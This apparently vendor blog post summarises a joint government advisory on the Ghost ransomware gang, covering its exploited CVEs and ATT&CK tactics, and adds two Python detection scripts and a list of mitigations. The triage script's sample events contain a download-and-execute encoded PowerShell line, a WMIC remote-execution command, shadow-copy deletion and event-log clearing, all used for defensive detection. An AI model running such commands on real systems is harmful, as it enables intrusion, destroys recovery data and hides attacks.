The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) recently issued a joint Cybersecurity Advisory about the China-based Ghost ransomware gang.
Ghost’s initial access method focuses on exploiting vulnerabilities in internet-facing devices (technique T1190) using publicly available exploits. Some of these vulnerabilities have had patches available for well over a decade. This highlights the importance of patch management in controlling an organisation’s attack surface, especially now that 34% of ransomware attacks exploit vulnerabilities as the initial access vector.
Because discovery and exploitation of these vulnerabilities can be highly automated, Ghost has been able to breach organisations across a wide range of sectors in over 70 countries since first appearing in 2021. Victims include government entities and providers of critical national infrastructure, as well as organisations in the education, healthcare, technology, and manufacturing sectors.
Tactics used by the Ghost ransomware gang
Below is a list of 11 tactics used by the Ghost ransomware gang, with links to the descriptions of the tactics and the corresponding techniques.
Initial access (tactic TA0001)
The vulnerabilities used by Ghost target many different types of systems, including:
- Fortinet FortiOS appliances: CVE-2018-13379
- Servers running Adobe ColdFusion: CVE-2010-2861 and CVE-2009-3960
- Microsoft SharePoint servers: CVE-2019-0604
- Microsoft Exchange servers: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 (the ProxyShell chain)
Execution (tactic TA0002)
Once inside a victim network, Ghost deploys a web shell (technique T1505.003) and uses it to issue commands through the Windows command shell and PowerShell (techniques T1059.003 and T1059.001), then downloads a Cobalt Strike Beacon (technique T1105).
Persistence (tactic TA0003)
In some attacks, Ghost creates new local or domain accounts (techniques T1136.001 and T1136.002, respectively) and changes the passwords of existing accounts (technique T1098).
More recently, Ghost has been observed moving laterally (tactic TA0008) to web servers inside the victim’s network and deploying web shells there (technique T1505.003).
Privilege escalation (tactic TA0004)
Ghost has been seen using open-source penetration testing tools, including BadPotato, GodPotato, and SharpZeroLogon, to escalate privileges (technique T1068).
Ghost also uses the Cobalt Strike Beacon installed during initial access to steal the access token of a process running in the SYSTEM user context, then launches a second Beacon with those SYSTEM privileges (technique T1134.001).
Defense evasion (tactic TA0005)
Ghost uses its deployed Cobalt Strike Beacon to list running processes and identify any endpoint security software on the host (technique T1518.001), which it then disables (technique T1562.001) using its escalated privileges.
Credential access (tactic TA0006)
Ghost either uses the hashdump feature of Cobalt Strike Beacon or deploys and runs Mimikatz to capture passwords and password hashes (technique T1003). It then uses these credentials to log into additional systems, escalate privileges, or pivot to other victim devices.
Discovery (tactic TA0007)
Internal reconnaissance starts with discovering domain accounts using Cobalt Strike Beacon (technique T1087.002). Ghost then uses open-source penetration testing tools such as SharpShares to discover network shares (technique T1135), and Ladon 911 and SharpNBTScan to discover other systems on the network (technique T1018).
Lateral movement (tactic TA0008)
Ghost uses the previously escalated privileges and Windows Management Instrumentation Command-Line (WMIC) (technique T1047) to execute base64-encoded PowerShell commands on additional systems in the victim network, typically to deploy further Cobalt Strike Beacons.
Exfiltration (tactic TA0010)
Unlike many other ransomware gangs, Ghost has not been observed exfiltrating significant amounts of victim data. Ghost typically exfiltrates only a limited amount, usually less than hundreds of gigabytes, but still threatens to publish it for extortion purposes.
Exfiltration methods include uploading data to Cobalt Strike Team Servers over the C2 channel (technique T1041) or to the Mega.nz file-sharing service (technique T1567.002).
Command and control (tactic TA0011)
For email communication with extortion victims (technique T1573), Ghost uses email providers that support encryption, including Mailfence, Onionmail, ProtonMail, Skiff, and Tutanota.
Ghost relies heavily on the built-in communication between Cobalt Strike Beacons installed in the victim’s network and Cobalt Strike Team Servers operated by Ghost. Beacons communicate over HTTP and HTTPS (technique T1071.001) directly to Ghost-controlled IP addresses rather than to registered domains.
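The C2 pattern above gives defenders a cheap hunting signal: web traffic whose destination host is an IP literal instead of a DNS name. The following is an added example in Python, not code from the advisory or from the original post; the proxy log format ("timestamp client method url status"), the client hosts and the destination addresses (IANA documentation ranges) are constructed for the example.

```python
"""Flag HTTP/HTTPS requests to bare IP addresses in a constructed proxy log."""
import ipaddress
from urllib.parse import urlsplit

# Ranges a client may legitimately reach by IP literal (RFC 1918, loopback,
# link-local, IPv6 ULA/link-local). Everything else is treated as external here;
# a real deployment would add its own allowlist on top of this.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
    "fc00::/7", "fe80::/10", "::1/128",
)]

# Constructed sample lines. 203.0.113.0/24, 198.51.100.0/24 and 2001:db8::/32
# are documentation ranges standing in for attacker-controlled infrastructure.
SAMPLE_LOG = """\
2025-02-19T10:01:02Z 10.0.5.23 GET http://203.0.113.45/pixel.gif 200
2025-02-19T10:01:05Z 10.0.5.23 CONNECT 203.0.113.45:443 200
2025-02-19T10:01:07Z 10.0.5.23 GET https://www.example.com/index.html 200
2025-02-19T10:01:09Z 10.0.5.24 CONNECT [2001:db8::10]:443 200
2025-02-19T10:01:11Z 10.0.5.24 GET http://10.0.0.7:8080/api/health 200
2025-02-19T10:01:12Z 10.0.5.25 GET http://198.51.100.7/ 404
"""


def literal_ip_host(url: str):
    """Return the host of *url* as an ip_address if it is an IP literal, else None.

    CONNECT targets arrive as "host:port" with no scheme; prefixing "//" makes
    urlsplit treat them as a network location, so bracketed IPv6 works too.
    """
    target = url if "://" in url else "//" + url
    host = urlsplit(target).hostname
    if host is None:
        return None
    try:
        return ipaddress.ip_address(host)
    except ValueError:  # a DNS name, not an IP literal
        return None


def is_internal(addr) -> bool:
    # Membership tests across IP versions simply return False, so mixing is safe.
    return any(addr in net for net in INTERNAL_NETS)


def find_direct_ip_connections(log_text: str) -> list:
    """Return (client, method, destination) for every external IP-literal request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line: skip it rather than abort the hunt
        _ts, client, method, url, _status = fields
        addr = literal_ip_host(url)
        if addr is not None and not is_internal(addr):
            hits.append((client, method, str(addr)))
    return hits


def suspicious_clients(log_text: str) -> dict:
    """Group flagged destinations per client so a beaconing host stands out."""
    by_client = {}
    for client, _method, dest in find_direct_ip_connections(log_text):
        by_client.setdefault(client, set()).add(dest)
    return by_client


if __name__ == "__main__":
    for client, dests in suspicious_clients(SAMPLE_LOG).items():
        print(f"{client} -> {', '.join(sorted(dests))}")
```

On its own, HTTP to a bare IP is noisy (CDNs, update agents and some SaaS clients do it), so in practice the per-client grouping is the pivot: a workstation that talks to one external IP at regular intervals over CONNECT is worth a closer look. The same check applies to TLS SNI fields or DNS-less flow logs, which is where a Beacon configured with an IP address rather than a domain will show up.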
Impact (tactic TA0040)
Ghost deploys and executes one of four ransomware payloads (CRING.EXE, GHOST.EXE, ELYSIUM.EXE, and LOCKER.EXE), each capable of encrypting specific directories or entire volumes (technique T1486). The payloads clear Windows Event Logs (technique T1070.001), disable the Volume Shadow Copy Service, and delete any shadow copies to inhibit system recovery (technique T1490).
Ghost then extorts victims by threatening to delete the decryption keys and to publish exfiltrated data (technique T1486).
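Three of the stages above leave process-creation evidence on the endpoint: a web server worker spawning a shell (execution), WMIC creating an encoded PowerShell process on another host (lateral movement), and shadow-copy deletion or event-log clearing (impact). The following Python example, added here and not taken from the advisory or the original post, triages constructed process-creation records whose fields mirror Sysmon Event ID 1 or Security Event ID 4688. Hostnames, file paths and the encoded payload are made up; the vssadmin and wevtutil command lines are common ways of producing the behaviour the advisory describes, not commands quoted from it.

```python
"""Triage Windows process-creation records for Ghost-style execution,
lateral movement and impact activity. All sample data is constructed."""
import base64
import re

# powershell.exe -EncodedCommand takes base64 of UTF-16LE text, so the sample
# payload is encoded exactly the way attacker tooling would encode it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

WEB_WORKERS = {"w3wp.exe", "httpd.exe"}              # IIS and Apache worker processes
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

SAMPLE_EVENTS = [
    # Execution: the IIS worker on a SharePoint host spawns a shell (web shell).
    {"host": "SP01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "whoami & ipconfig /all"'},
    # Lateral movement, source side: WMIC starts encoded PowerShell on FS02.
    {"host": "SP01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": f'wmic /node:FS02 process call create "powershell -nop -w hidden -enc {ENCODED}"'},
    # Lateral movement, target side: the WMI provider host is the parent.
    {"host": "FS02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -nop -w hidden -enc {ENCODED}"},
    # Impact: recovery inhibited and logs cleared (payload path is constructed).
    {"host": "FS02", "parent": r"C:\Users\Public\locker.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "FS02", "parent": r"C:\Users\Public\locker.exe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    # Benign: an administrator runs a script from the desktop.
    {"host": "ADM01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\Backup.ps1"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> list:
    """Map one process-creation record to the ATT&CK techniques it exhibits."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    low = ev["cmdline"].lower()
    findings = []
    if parent in WEB_WORKERS and image in SHELLS:
        findings.append(f"T1505.003 web shell: {parent} spawned {image}")
    if parent == "wmiprvse.exe" and image in SHELLS:
        findings.append(f"T1047 WMI-spawned {image} (remote execution target)")
    if image == "wmic.exe" and "/node:" in low and "process call create" in low:
        findings.append("T1047 WMIC remote process creation")
    decoded = decode_encoded_powershell(ev["cmdline"])
    if decoded is not None:
        findings.append(f"T1059.001 encoded PowerShell: {decoded}")
    if (image == "vssadmin.exe" and "delete shadows" in low) or \
       (image == "wmic.exe" and "shadowcopy delete" in low):
        findings.append("T1490 shadow copies deleted")
    if image == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", low):
        findings.append("T1070.001 event log cleared")
    return findings


def triage(events: list) -> dict:
    """Group findings per host; hosts with nothing suspicious are omitted."""
    report = {}
    for ev in events:
        for finding in triage_event(ev):
            report.setdefault(ev["host"], []).append(finding)
    return report


if __name__ == "__main__":
    for host, findings in triage(SAMPLE_EVENTS).items():
        print(host)
        for finding in findings:
            print("  ", finding)
```

Two operational points follow from the sample. Command-line auditing has to be on (Sysmon, or 4688 with "Include command line in process creation events"), otherwise the encoded payload and the WMIC target never reach the SIEM. And the lateral-movement picture only appears when both sides are collected: the WMIC event lands on the source host, while the WmiPrvSE.exe-parented PowerShell lands on the target, so a detection that only watches servers already known to be compromised will miss the hop.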
Actions to take today
Now that you know what the Ghost ransomware gang is doing, what can you do to mitigate the impact? Start by implementing the mitigations below, taken from the joint Cybersecurity Advisory from CISA, FBI, and MS-ISAC. Note that I’ve added information about Cohesity solutions that can help build resilience to the Ghost ransomware gang.
1. Maintain regular system backups that are known-good and stored offline.
- Cohesity DataProtect and Cohesity FortKnox provide this capability.
2. Ghost actors run many commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who identify and respond to this unusual behavior have successfully prevented Ghost ransomware attacks.
- These activities typically leave Indicators of Compromise (IOCs) on victim machines. Cohesity DataHawk’s threat hunting capability can discover these IOCs and is resistant to Ghost’s defense evasion techniques.
3. Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe.
- Cohesity CyberScan allows owners of Tenable Vulnerability Scanner to use their license to scan backup snapshots for vulnerabilities. This is ideal for ensuring fragile assets are included in vulnerability management and investigating the attack surface at the time of the attack.
5. Segment networks to restrict lateral movement between initially infected devices and other devices in the same organization.
5. Require phishing-resistant MFA for access to all privileged accounts and email services accounts.
Read the full list of mitigations from the joint Cybersecurity Advisory.